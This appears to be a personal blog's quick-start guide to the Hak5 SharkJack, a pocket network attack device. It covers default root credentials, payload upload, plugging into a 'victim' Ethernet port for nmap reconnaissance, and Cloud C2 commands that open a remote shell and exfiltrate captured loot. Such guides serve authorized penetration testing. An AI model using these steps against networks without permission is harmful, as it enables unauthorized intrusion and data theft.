[HOW-TO] Operate the SharkJack ๐Ÿฆˆ

A Quick-Start Guide for the Hak5 SharkJack, a portable network attack tool

Access the SharkJack

  1. Switch to Arming Mode (center), and connect to PC via Ethernet
  2. Find the IP: Default is, run ifconfig to check
  3. Login: ssh root@, using password hak5shark
  4. On first setup, change the default password, run passwd

Navigating the SharkJack

  • The active payload is located at: ~/payload/payload.sh
  • Captured loot is stored with the ~/loot/... directory
  • To save all loot locally, run: scp -r root@* .
  • To upload a new payload, run scp payload.sh root@

Conducting an Attack

  1. Flip into Attack Mode (fully forward), and wait for LED to go magenta
  2. Plug device into victim Ethernet port, watch LED's blink
  3. Once LED turns off, unplug device and switch to off

Out-of-the box, the ShakJack comes with an nmap payload, useful for initial network reconnaissance

Additional Tools

CLI Helper Tool

The SharkJack Helper a CLI tool for carrying out common tasks:
Get a shell, push a payload, grab saved loot and upgrade the firmware etc

  1. Download from: https://downloads.hak5.org/shark
  2. Make executable: chmod +x sharkjack.sh
  3. Run ./sharkjack.sh, and follow on-screen prompts

Web Interface

Once the firmware has been updated (V1.01 and newer), you can access the SharkJack's web interface by visiting in your browser. From here you can view and modify the current payload, download your loot and view device status

Cloud C2

  1. Download and run Cloud C2 for your system, from https://shop.hak5.org/products/c2
  2. Go to Add Device --> SharkJack. Then select the listing --> Setup, and config file will download
  3. The device.config needs to be uploaded to /etc. Run scp device.config root@
  4. To connect, run CTCONNECT. Back on the web interface, your now able to open a shell, for remote access!
  5. To get the loot, run C2EFIL STRING /root/loot/nmap/nmap-scan_1.txt nmap, data now will show up in Loot tab!

Note that it the SharkJack does not connect to CloudC2 automatically, but by using the CTCONNECT and C2EFIL .. commands to your payload, you'll be able to exfiltrate the loot immediately, and access it remotely.

Reference Info

Switch Positions

  • Back: Off/ Charging
  • Middle: Arming Mode
  • Front: Attack Mode

LET Lights

  • Green (blinking): Booting up
  • Blue (blinking): Charging
  • Blue (solid): Fully Charged
  • Yellow (blinking): Arming Mode
  • Red (blinking): Error / No Payload

Individual Payloads have their own LED routines, but usually:
Red: Setup, Amber: Scanning, Green: Finished


  • OS: OpenWRT 19.07-based GNU/Linux
  • SoC: 580MHz MediaTek MT7628DAN mips CPU
  • MEMORY: 64 MB DDR2 RAM, 64 MB SPI Flash
  • IO: RJ45 IEEE 802.3 Ethernet + USB-C charge port
  • DIMENSIONS: 62 x 21 x 12 mm
  • POWER: 2.5W (USB 5V 0.5A)
  • BATTERY: 1S 401020 3.7V 50mAh 0.2W LiPo
  • BATTERY TIMES: ~15 mins run, ~7 mins charge
  • TEMP: Operating- 35ยบC ~ 45ยบC, Storage -20ยบC ~ 50ยบC
  • RELATIVE HUMIDITY: 0% to 90% (noncondensing)

You'll only receive email when they publish something new.

More from Alicia's Notes ๐Ÿš€
All posts